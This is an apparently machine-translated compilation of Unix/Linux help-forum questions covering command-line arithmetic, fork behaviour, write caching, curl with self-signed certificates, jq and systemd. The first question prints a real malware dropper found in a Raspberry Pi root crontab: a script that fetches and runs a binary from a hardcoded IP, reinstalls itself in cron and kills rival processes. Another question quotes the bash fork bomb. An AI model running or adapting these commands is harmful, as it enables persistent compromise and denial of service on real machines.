全部问题(unix)

我想在我的 Raspberry Pi 上的根 crontab 文件中添加一些内容，并发现了一个对我来说似乎可疑的条目，在 Google 上搜索它的部分内容却一无所获。

crontab 条目：

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

的内容http://103.219.112.66:8000/i.sh是：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

我的 Linux 知识有限，但对我来说，从印度尼西亚服务器下载二进制文件并定期以 root 身份运行它们似乎并不常见。

这是什么？我应该怎么办？

问题：

我时不时需要在命令行环境中进行简单的算术运算。EG 给出以下输出：

Disk /dev/sdb: 256GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags: 

Number  Start   End     Size    File system     Name  Flags
 1      1049kB  106MB   105MB   fat32                 hidden, diag
 2      106MB   64.1GB  64.0GB  ext4
 3      64.1GB  192GB   128GB   ext4
 5      236GB   256GB   20.0GB  linux-swap(v1)

在命令行上计算分区 3 和 5 之间未分配空间大小的简单方法是什么？

我已经尝试过的：

公元前

bc
bc 1.06.95
Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006 Free Software Foundation, Inc.
This is free software with ABSOLUTELY NO WARRANTY.
For details type `warranty'. 
236-192
44
quit

上面的粗体字是我需要输入的所有内容来做一个简单236-192的bc 1+1回声File 1+1 is unavailable.

表达式

expr 236 - 192

我需要在运算符之前和之后键入空格expr 1+1，就像 echoes一样1+1。

最近我一直在挖掘有关 GNU/Linux 中进程的信息，并且遇到了臭名昭著的 fork 炸弹：

:(){ : | :& }; :

理论上，它应该无限复制自己，直到系统耗尽资源......

但是，我已经尝试在CLI Debian和GUI Mint发行版上进行测试，它似乎对系统没有太大影响。是的，有很多进程被创建，过了一会儿我读到了控制台消息，比如：

bash：fork：资源暂时不可用

bash：fork：重试：没有子进程

但一段时间后，所有进程都会被杀死，一切都恢复正常。我已经读过ulimit为每个用户设置了最大进程数，但我似乎无法将它提高到很远。

针对叉形炸弹的系统保护措施是什么？为什么它不会自我复制，直到一切都冻结或至少滞后很多？有没有办法用叉子炸弹真正使系统崩溃？

我以前认为文件更改是直接保存到磁盘中的，即只要我关闭文件并决定单击/选择保存。然而，在最近的一次谈话中，我的一个朋友告诉我这通常不是真的。操作系统（特别是我们谈论的 Linux 系统）将更改保存在内存中，并且它有一个守护进程，它实际上将内容从内存写入磁盘。

他甚至举了外部闪存驱动器的例子：它们被安装到系统中（复制到内存中），有时会发生数据丢失，因为守护程序尚未将内容保存到闪存中；这就是我们卸载闪存驱动器的原因。

我对操作系统的功能一无所知，所以我完全不知道这是否属实以及在什么情况下。我的主要问题是：这是否像 Linux/Unix 系统（可能还有其他操作系统）中描述的那样发生？例如，这是否意味着如果我在编辑和保存文件后立即关闭计算机，我的更改很可能会丢失？也许这取决于磁盘类型——传统硬盘驱动器与固态磁盘？

该问题专门针对具有存储信息的磁盘的文件系统，即使任何澄清或比较都受到好评。

我使用Let's Encrypt 推荐使用这个 Makefile为 foo.localhost 创建了一个自签名证书：

include ../.env

configuration = csr.cnf
certificate = self-signed.crt
key = self-signed.key

.PHONY: all
all: $(certificate)

$(certificate): $(configuration)
    openssl req -x509 -out $@ -keyout $(key) -newkey rsa:2048 -nodes -sha256 -subj '/CN=$(HOSTNAME)' -extensions EXT -config $(configuration)

$(configuration):
    printf "[dn]\nCN=$(HOSTNAME)\n[req]\ndistinguished_name = dn\n[EXT]\nsubjectAltName=DNS:$(HOSTNAME)\nkeyUsage=digitalSignature\nextendedKeyUsage=serverAuth" > $@

.PHONY: clean
clean:
    $(RM) $(configuration)

然后，我将其分配给 Web 服务器。我已验证服务器返回相关证书：

$ openssl s_client -showcerts -connect foo.localhost:8443 < /dev/null
CONNECTED(00000003)
depth=0 CN = foo.localhost
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = foo.localhost
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/CN=foo.localhost
   i:/CN=foo.localhost
-----BEGIN CERTIFICATE-----
[…]
-----END CERTIFICATE-----
---
Server certificate
subject=/CN=foo.localhost
issuer=/CN=foo.localhost
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1330 bytes and written 269 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES128-GCM-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
    Session-ID: […]
    Session-ID-ctx: 
    Master-Key: […]
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket:
    […]

    Start Time: 1529622990
    Timeout   : 7200 (sec)
    Verify return code: 21 (unable to verify the first certificate)
    Extended master secret: no
---
DONE

如何在不修改 /etc 中的任何内容的情况下让 cURL 信任它？ --cacert不起作用，大概是因为没有CA ：

$ curl --cacert tls/foo.localhost.crt 'https://foo.localhost:8443/'
curl: (60) SSL certificate problem: unable to get local issuer certificate
More details here: https://curl.haxx.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.

目标是在开发过程中启用 HTTPS：

• 如果没有在所有开发环境中启用 DNS 验证的大量工作，我就无法拥有完全类似于生产的证书。因此我必须使用自签名证书。
• 我显然仍然想让我的开发环境尽可能地类似于生产环境，所以我不能简单地忽略任何和所有证书问题。curl -k就像catch (Exception e) {}在这种情况下一样 - 完全不像浏览器与 Web 服务器通信。

换句话说，当我跑步时，curl [something] https://project.local/api/foo我想确信

1. 如果 TLS 配置正确，除了具有自签名证书，该命令将成功并且
2. 如果我的 TLS 配置有任何问题，除了拥有自签名证书，该命令将失败。

使用 HTTP 或--insecure不符合第二个标准。

在程序 1Hello world中只打印一次，但是当我删除 \n并运行它（程序 2）时，输出会打印 8 次。有人可以解释一下\n这里的意义以及它如何影响fork()吗？

程序 1

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("hello world...\n");
    fork();
    fork();
    fork();
}

输出 1：

hello world... 

节目二

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("hello world...");
    fork();
    fork();
    fork();
}

输出 2：

hello world... hello world...hello world...hello world...hello world...hello world...hello world...hello world...

输入json：

[
  {
    "id": "89",
    "hostname": "abcd"
  },
  {
    "id": "89",
    "hostname": "babcd"
  }
]

如何修改以下过滤器以仅输出以“abcd”开头的主机名？

$ jq -r '.[]|select(.hostname | contains("abcd"))' jjjj
{
  "id": "89",
  "hostname": "abcd"
}
{
  "id": "89",
  "hostname": "babcd"
}
$ jq -r '.[]|select(.hostname | contains("^abcd"))' jjjj
$

我尝试sha256sum在 High Sierra 中使用；我试图用 安装它MacPorts，如：

sudo port install sha256sum

那没起效。

该怎么办？

我正在尝试yum update在 RHEL 7.4 之后重新启动服务。我可以使用 systemctl 重新启动每个服务，但是needs-restartingfromyum utils告诉我我还应该重新启动 systemd 本身：

# needs-restarting
1 : /usr/lib/systemd/systemd --system --deserialize 21

我可以systemd在不重新启动服务器的情况下重新启动吗？如何？

我发现了一些提及systemctl daemon-reload，但这并没有使它从需要重新启动列表中消失。

抱歉，这个标题不是我设计过的最优雅的。

但我想很多人都会想知道这一点，我的问题可能是一个骗局……我只能说我还没有找到它。

当我说“向上滚动”时，我的意思是使用键盘上的“向上箭头”键，这显然会让您向上滚动浏览历史记录，从最近的命令开始。

所以你发现一个命令可能是 30 个命令......然后你运行它。然后你想运行最初出现在它之后的命令......有没有一种快速的方式来做到这一点？或者那些精通 BASH 的人是如何做到这一点的？